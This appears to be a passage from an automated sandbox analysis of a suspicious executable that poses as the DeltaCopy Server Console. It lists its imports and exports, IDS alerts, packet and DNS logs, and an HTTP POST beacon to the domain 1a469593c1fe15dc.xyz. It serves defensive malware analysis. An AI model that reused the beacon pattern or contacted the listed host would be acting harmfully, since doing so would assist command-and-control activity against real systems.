KERNEL32.DLL	CloseHandle, CompareStringA, CreateDirectoryA, CreateEventA, CreateFileA, CreatePipe, CreateProcessA, CreateThread, DeleteCriticalSection, DeleteFileA, EnterCriticalSection, EnumCalendarInfoA, ExitProcess, FindClose, FindFirstFileA, FindResourceA, FormatMessageA, FreeLibrary, FreeResource, GetACP, GetCPInfo, GetCommandLineA, GetCurrentProcessId, GetCurrentThreadId, GetDateFormatA, GetDiskFreeSpaceA, GetEnvironmentStrings, GetExitCodeProcess, GetFileAttributesA, GetFileType, GetFullPathNameA, GetLastError, GetLocalTime, GetLocaleInfoA, GetModuleFileNameA, GetModuleHandleA, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemDefaultLangID, GetThreadLocale, GetTickCount, GetUserDefaultLCID, GetVersion, GetVersionExA, GlobalAddAtomA, GlobalAlloc, GlobalDeleteAtom, GlobalFindAtomA, GlobalFree, GlobalLock, GlobalUnlock, HeapAlloc, HeapFree, InitializeCriticalSection, InterlockedDecrement, InterlockedExchange, InterlockedIncrement, IsValidLocale, LCMapStringA, LeaveCriticalSection, LoadLibraryA, LoadLibraryExA, LoadResource, LockResource, MulDiv, MultiByteToWideChar, RaiseException, ReadFile, ResetEvent, RtlUnwind, SetConsoleCtrlHandler, SetEndOfFile, SetErrorMode, SetEvent, SetFilePointer, SetHandleCount, SetHandleInformation, SetLastError, SetThreadLocale, SizeofResource, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, VirtualQuery, WaitForSingleObject, WideCharToMultiByte, WriteFile, lstrcpyA, lstrcpynA, lstrlenA
VERSION.DLL	GetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA
COMCTL32.DLL	ImageList_Add, ImageList_BeginDrag, ImageList_Destroy, ImageList_DragEnter, ImageList_DragLeave, ImageList_DragMove, ImageList_DragShowNolock, ImageList_Draw, ImageList_DrawEx, ImageList_EndDrag, ImageList_GetBkColor, ImageList_GetDragImage, ImageList_GetIconSize, ImageList_GetImageCount, ImageList_Read, ImageList_Remove, ImageList_Replace, ImageList_SetBkColor, ImageList_SetIconSize, ImageList_Write, _TrackMouseEvent, ImageList_Create
GDI32.DLL	BitBlt, CopyEnhMetaFileA, CreateBitmap, CreateBrushIndirect, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBSection, CreateDIBitmap, CreateFontIndirectA, CreateHalftonePalette, CreatePalette, CreatePenIndirect, CreateSolidBrush, DeleteDC, DeleteEnhMetaFile, DeleteObject, ExcludeClipRect, ExtTextOutA, GetBitmapBits, GetBrushOrgEx, GetClipBox, GetCurrentPositionEx, GetDCOrgEx, GetDIBColorTable, GetDIBits, GetDeviceCaps, GetEnhMetaFileBits, GetEnhMetaFileHeader, GetEnhMetaFilePaletteEntries, GetObjectA, GetPaletteEntries, GetPixel, GetRgnBox, GetStockObject, GetSystemPaletteEntries, GetTextExtentPoint32A, GetTextExtentPointA, GetTextMetricsA, GetWinMetaFileBits, GetWindowOrgEx, IntersectClipRect, LineTo, MaskBlt, MoveToEx, PatBlt, PlayEnhMetaFile, Polyline, RealizePalette, RectVisible, Rectangle, RestoreDC, SaveDC, SelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetBrushOrgEx, SetDIBColorTable, SetEnhMetaFileBits, SetPixel, SetROP2, SetStretchBltMode, SetTextColor, SetViewportOrgEx, SetWinMetaFileBits, SetWindowOrgEx, StretchBlt, UnrealizeObject
SHELL32.DLL	SHBrowseForFolderA, SHGetMalloc, ShellExecuteA, SHGetPathFromIDListA
USER32.DLL	ActivateKeyboardLayout, AdjustWindowRectEx, BeginPaint, CallNextHookEx, CallWindowProcA, CharLowerA, CharLowerBuffA, CharNextA, CharNextW, CharToOemA, CharUpperBuffA, CheckMenuItem, ClientToScreen, CloseClipboard, CreateIcon, CreateMenu, CreatePopupMenu, CreateWindowExA, DefFrameProcA, DefMDIChildProcA, DefWindowProcA, DeleteMenu, DestroyCursor, DestroyIcon, DestroyMenu, DestroyWindow, DispatchMessageA, DispatchMessageW, DrawEdge, DrawFocusRect, DrawFrameControl, DrawIcon, DrawIconEx, DrawMenuBar, DrawTextA, EmptyClipboard, EnableMenuItem, EnableScrollBar, EnableWindow, EndPaint, EnumChildWindows, EnumThreadWindows, EnumWindows, EqualRect, FillRect, FindWindowA, FrameRect, GetActiveWindow, GetCapture, GetClassInfoA, GetClassLongA, GetClientRect, GetClipboardData, GetCursor, GetCursorPos, GetDC, GetDCEx, GetDesktopWindow, GetFocus, GetForegroundWindow, GetIconInfo, GetKeyNameTextA, GetKeyState, GetKeyboardLayout, GetKeyboardLayoutList, GetKeyboardLayoutNameA, GetKeyboardState, GetKeyboardType, GetLastActivePopup, GetMenu, GetMenuItemCount, GetMenuItemID, GetMenuItemInfoA, GetMenuState, GetMenuStringA, GetMessagePos, GetParent, GetPropA, GetScrollInfo, GetScrollPos, GetScrollRange, GetSubMenu, GetSysColor, GetSysColorBrush, GetSystemMenu, GetTopWindow, GetWindow, GetWindowDC, GetWindowLongA, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextA, GetWindowThreadProcessId, InflateRect, InsertMenuA, InsertMenuItemA, IntersectRect, InvalidateRect, IsChild, IsDialogMessageA, IsDialogMessageW, IsIconic, IsRectEmpty, IsWindow, IsWindowEnabled, IsWindowUnicode, IsWindowVisible, IsZoomed, KillTimer, LoadBitmapA, LoadCursorA, LoadIconA, LoadKeyboardLayoutA, LoadStringA, MapVirtualKeyA, MapWindowPoints, MessageBeep, MessageBoxA, OemToCharA, OffsetRect, OpenClipboard, PeekMessageA, PeekMessageW, PostMessageA, PostQuitMessage, PtInRect, RedrawWindow, RegisterClassA, RegisterClipboardFormatA, RegisterWindowMessageA, ReleaseCapture, ReleaseDC, RemoveMenu, RemovePropA, ScreenToClient, ScrollWindow, SendMessageA, SendMessageW, SetActiveWindow, SetCapture, SetClassLongA, SetClipboardData, SetCursor, SetFocus, SetForegroundWindow, SetMenu, SetMenuItemInfoA, SetParent, SetPropA, SetRect, SetScrollInfo, SetScrollPos, SetScrollRange, SetTimer, SetWindowLongA, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowTextA, SetWindowsHookExA, ShowOwnedPopups, ShowScrollBar, ShowWindow, SystemParametersInfoA, TrackPopupMenu, TranslateMDISysAccel, TranslateMessage, UnhookWindowsHookEx, UnregisterClassA, UpdateWindow, WaitMessage, WindowFromPoint, wsprintfA, GetSystemMetrics
OLE32.DLL	CoInitialize, CoUninitialize
OLEAUT32.DLL	GetErrorInfo, SafeArrayAccessData, SafeArrayCreate, SafeArrayGetElement, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayUnaccessData, SysAllocStringLen, SysFreeString, SysReAllocStringLen, VariantChangeType, VariantClear, VariantCopy, VariantCopyInd, VariantInit

Exports

Name	Ordinal	Address
@@Consolerunner@Finalize	17	0x40bda8
@@Consolerunner@Initialize	16	0x40bd98
@@Dcconfig@Finalize	15	0x40af38
@@Dcconfig@Initialize	14	0x40af28
@@Genutils@Finalize	11	0x409df4
@@Genutils@Initialize	10	0x409de4
@@Installservice@Finalize	13	0x40a108
@@Installservice@Initialize	12	0x40a0f8
@@Logger@Finalize	7	0x407f18
@@Logger@Initialize	6	0x407f08
@@Mainformserver@Finalize	3	0x40709c
@@Mainformserver@Initialize	2	0x40708c
@@Rsyncconfigadapter@Finalize	9	0x409724
@@Rsyncconfigadapter@Initialize	8	0x409714
@@Servicestatus@Finalize	5	0x407ef8
@@Servicestatus@Initialize	4	0x407ee8
_AboutBox	21	0x4bfdfc
__GetExceptDLLinfo	1	0x401529
___CPPdebugHook	18	0x4b3098
_frmMainFormServer	19	0x4bfdd8
_frmServiceInstallParams	20	0x4bfdf0

Version Infos

Description	Data
LegalCopyright
InternalName
FileVersion	1.4.8.39
CompanyName	Synametrics Technologies
LegalTrademarks
Comments
ProductName
ProductVersion	1.4.0.0
FileDescription	DeltaCopy Server Console
OriginalFilename
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/30/21-18:07:06.601323	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49719	198.54.117.244	192.168.2.3
01/30/21-18:07:07.880098	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49722	198.54.117.244	192.168.2.3
01/30/21-18:07:08.591456	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49724	198.54.117.244	192.168.2.3
01/30/21-18:07:14.008676	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49725	198.54.117.244	192.168.2.3
01/30/21-18:07:14.619901	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49726	198.54.117.244	192.168.2.3
01/30/21-18:07:15.144808	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49727	198.54.117.244	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 30, 2021 18:07:06.210726976 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:06.403480053 CET	80	49719	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:06.403696060 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:06.406303883 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:06.599004030 CET	80	49719	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:06.601322889 CET	80	49719	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:06.601901054 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:06.796137094 CET	80	49719	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:06.796307087 CET	49719	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:07.490804911 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:07.683409929 CET	80	49722	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:07.683552027 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:07.685383081 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:07.878056049 CET	80	49722	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:07.880098104 CET	80	49722	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:07.880626917 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.073276997 CET	80	49722	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.073477983 CET	49722	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.197784901 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.390644073 CET	80	49724	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.390822887 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.394299984 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.589684963 CET	80	49724	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.591455936 CET	80	49724	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.592592955 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:08.785509109 CET	80	49724	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:08.785602093 CET	49724	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:13.616790056 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:13.811124086 CET	80	49725	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:13.812325954 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:13.813857079 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.006803989 CET	80	49725	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.008676052 CET	80	49725	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.009018898 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.177283049 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.202198982 CET	80	49725	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.202378035 CET	49725	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.381540060 CET	80	49726	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.382061958 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.412805080 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.617053032 CET	80	49726	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.619900942 CET	80	49726	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.620208025 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.755372047 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.824516058 CET	80	49726	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.824613094 CET	49726	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.948894978 CET	80	49727	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:14.949055910 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:14.949810982 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:15.142932892 CET	80	49727	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:15.144808054 CET	80	49727	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:15.145297050 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:15.338454008 CET	80	49727	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:15.338656902 CET	49727	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:20.990362883 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.184590101 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.187263012 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.187683105 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.380393982 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382164001 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382209063 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382245064 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382270098 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382303953 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382338047 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382364988 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.382447958 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382452965 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.382677078 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382715940 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382752895 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.382836103 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575056076 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575086117 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575108051 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575130939 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575162888 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575184107 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575192928 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575206995 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575227976 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575247049 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575248957 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575315952 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575320959 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575335026 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575356007 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575366974 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575385094 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575428009 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575431108 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575443029 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575447083 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575457096 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575506926 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575506926 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575547934 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575568914 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.575575113 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.575586081 CET	49728	80	192.168.2.3	198.54.117.244

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 30, 2021 18:06:57.798837900 CET	58361	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:06:57.849272966 CET	53	58361	8.8.8.8	192.168.2.3
Jan 30, 2021 18:06:58.594795942 CET	63492	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:06:58.645800114 CET	53	63492	8.8.8.8	192.168.2.3
Jan 30, 2021 18:06:59.492619991 CET	60831	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:06:59.542228937 CET	53	60831	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:00.733872890 CET	60100	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:00.784677029 CET	53	60100	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:01.688034058 CET	53195	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:01.736174107 CET	53	53195	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:03.484817028 CET	50141	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:03.537050962 CET	53	50141	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:04.422413111 CET	53023	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:04.470484018 CET	53	53023	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:05.356825113 CET	49563	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:05.404755116 CET	53	49563	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:05.990397930 CET	51352	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:06.197981119 CET	53	51352	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:06.218885899 CET	59349	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:06.269610882 CET	53	59349	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:07.180414915 CET	57084	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:07.236548901 CET	53	57084	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:07.411179066 CET	58823	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:07.471576929 CET	53	58823	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:07.974386930 CET	57568	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:08.141705990 CET	50540	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:08.181598902 CET	53	57568	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:08.192459106 CET	53	50540	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:13.549628973 CET	54366	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:13.608412027 CET	53	54366	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:14.104800940 CET	53034	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:14.163925886 CET	53	53034	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:14.691560030 CET	57762	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:14.749855042 CET	53	57762	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:20.922744036 CET	55435	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:20.978969097 CET	53	55435	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:30.925522089 CET	50713	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:31.014501095 CET	53	50713	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:31.184478998 CET	56132	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:31.232460976 CET	53	56132	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:38.393892050 CET	58987	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:38.454243898 CET	53	58987	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:46.740554094 CET	56579	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:46.788635015 CET	53	56579	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:48.558598995 CET	60633	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:48.628153086 CET	53	60633	8.8.8.8	192.168.2.3
Jan 30, 2021 18:08:05.804579020 CET	61292	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:08:05.852957010 CET	53	61292	8.8.8.8	192.168.2.3
Jan 30, 2021 18:08:08.752002954 CET	63619	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:08:08.812397003 CET	53	63619	8.8.8.8	192.168.2.3
Jan 30, 2021 18:08:40.273401976 CET	64938	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:08:40.321517944 CET	53	64938	8.8.8.8	192.168.2.3
Jan 30, 2021 18:08:41.884599924 CET	61946	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:08:41.958970070 CET	53	61946	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:48.985775948 CET	64910	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:49.060224056 CET	53	64910	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:49.699404955 CET	52123	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:49.759006977 CET	53	52123	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:50.636343956 CET	56130	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:50.695831060 CET	53	56130	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:51.148247957 CET	56338	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:51.228003979 CET	53	56338	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:51.806870937 CET	59420	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:51.863326073 CET	53	59420	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 30, 2021 18:07:05.990397930 CET	192.168.2.3	8.8.8.8	0x47c4	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:07.411179066 CET	192.168.2.3	8.8.8.8	0x92af	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:07.974386930 CET	192.168.2.3	8.8.8.8	0x1ada	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:13.549628973 CET	192.168.2.3	8.8.8.8	0x4275	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:14.104800940 CET	192.168.2.3	8.8.8.8	0xed4c	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:14.691560030 CET	192.168.2.3	8.8.8.8	0xd1bb	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:20.922744036 CET	192.168.2.3	8.8.8.8	0xeb1e	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 30, 2021 18:07:06.197981119 CET	8.8.8.8	192.168.2.3	0x47c4	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:07.471576929 CET	8.8.8.8	192.168.2.3	0x92af	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:08.181598902 CET	8.8.8.8	192.168.2.3	0x1ada	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:13.608412027 CET	8.8.8.8	192.168.2.3	0x4275	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:14.163925886 CET	8.8.8.8	192.168.2.3	0xed4c	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:14.749855042 CET	8.8.8.8	192.168.2.3	0xd1bb	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:20.978969097 CET	8.8.8.8	192.168.2.3	0xeb1e	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

1a469593c1fe15dc.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49719	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:06.406303883 CET	116	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 93 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 5a 64 4d 30 58 42 72 45 4c 4b 67 75 74 77 72 64 4a 74 62 31 69 71 5a 6e 39 6a 6a 58 68 58 56 55 41 7e 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFZdM0XBrELKgutwrdJtb1iqZn9jjXhXVUA~~
Jan 30, 2021 18:07:06.601322889 CET	121	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 